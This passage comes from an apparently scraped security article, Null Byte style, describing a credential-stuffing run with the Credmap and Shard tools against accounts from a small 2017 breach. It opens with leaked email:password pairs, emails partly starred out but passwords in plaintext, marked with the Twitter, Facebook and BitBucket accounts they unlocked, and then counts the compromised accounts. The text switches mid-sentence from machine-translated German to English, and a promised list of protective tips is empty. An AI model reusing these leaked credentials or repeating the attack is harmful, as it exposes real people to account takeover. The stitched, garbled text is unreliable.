[+] ******* @ gmail.com:indonesia2016 - BitBucket
[+] ******* @ live.co.uk:01cs653 - Facebook, BitBucket
[+] ******* @ gmail.com: Battlefield710 - Twitter, BitBucket
[+] ******* @ gmail.com:Supaman1 - Facebook
[+] ******* @ hotmail.com:Bigdick*12 - BitBucket
[+] ******* @ outlook.com:darkstar1 - BitBucket
[+] ******* @ web.de:gt9800 - BitBucket
[+] ******* @ yahoo.com: mvp123 - Twitter
[+] ******* @ yahoo.com:arturi09 - BitBucket
[+] ******* @ gmail.com:092486 - BitBucket
[+] ******* @ hotmail.com:sappeps12345 - BitBucket
[+] ******* @ yahoo.com: 1morerep - Twitter, BitBucket
[+] ******* @ cox.net:joiedevivre - BitBucket
[+] ******* @ gmail.com:23vec4rPcC - BitBucket 

Nachdem der Shard-Befehl ausgeführt wurde, wurden insgesamt 219 Twitter-, Facebook-, BitBucket- und Kijiji-Accounts mit dem gleichen Benutzernamen wie password gemeldet Kombinationen. Interessanterweise gab es diesmal keine Reddit-Erkennungen.

Die Shard-Ergebnisse bestimmten, dass 166 BitBucket-Konten mit diesem Passwortwiederverwendungsangriff kompromittiert wurden, was nicht mit der BitBucket-Erkennung von 111 Konten von Credmap übereinstimmt. Sowohl Crepmap als auch Shard wurden seit 2016 nicht aktualisiert und ich vermute, dass die BitBucket-Ergebnisse größtenteils (wenn nicht vollständig) falsch-positiv sind. Es ist möglich, dass BitBucket seine Login-Parameter seit 2016 geändert hat und Credmap und Shards Fähigkeit, einen verifizierten Login-Versuch zu erkennen, verworfen hat.

Motivierte Hacker können noch mehr Passwörter knacken

Insgesamt die kompromittierten Accounts (ohne die BitBucket-Daten) bestand aus 61 von Twitter, 52 von Reddit, 17 von Facebook, 29 von Scribd, 23 von Microsoft, und eine Handvoll von Foursquare, Wunderlist und Kijiji. Ungefähr 200 Online-Accounts wurden aufgrund einer kleinen Datenverletzung im Jahr 2017 kompromittiert.

Und denken Sie daran, dass weder Credmap noch Shard nach Passwortwiederverwendung gegen Amazon, Google Mail, Netflix, iCloud, Bankwebsites oder kleinere Websites suchen that likely contain personal information like BestBuy, Macy's, and airline companies.

If the Credmap and Shard detections were updated, and if I had dedicated more time to crack the remaining 57% of hashes, the results would be higher. With very little effort and time, an attacker is capable of compromising hundreds of online accounts using just a small data breach consisting of 1,100 email addresses and hashed passwords.

A motivated attacker with 8 million or 26 million unique datasets would be able to cause major destruction across thousands of online accounts.

Don't Ignore Data Breaches…

If you don't want your usernames and passwords showing up in any of these leaked databases, there are a few obvious things you can do:

And until next time, you can find me on the darknet.

Don't Miss: The 4 Best Password Managers for Android & iPhone

Cover photo by Justin Meyers/Null Byte




Source link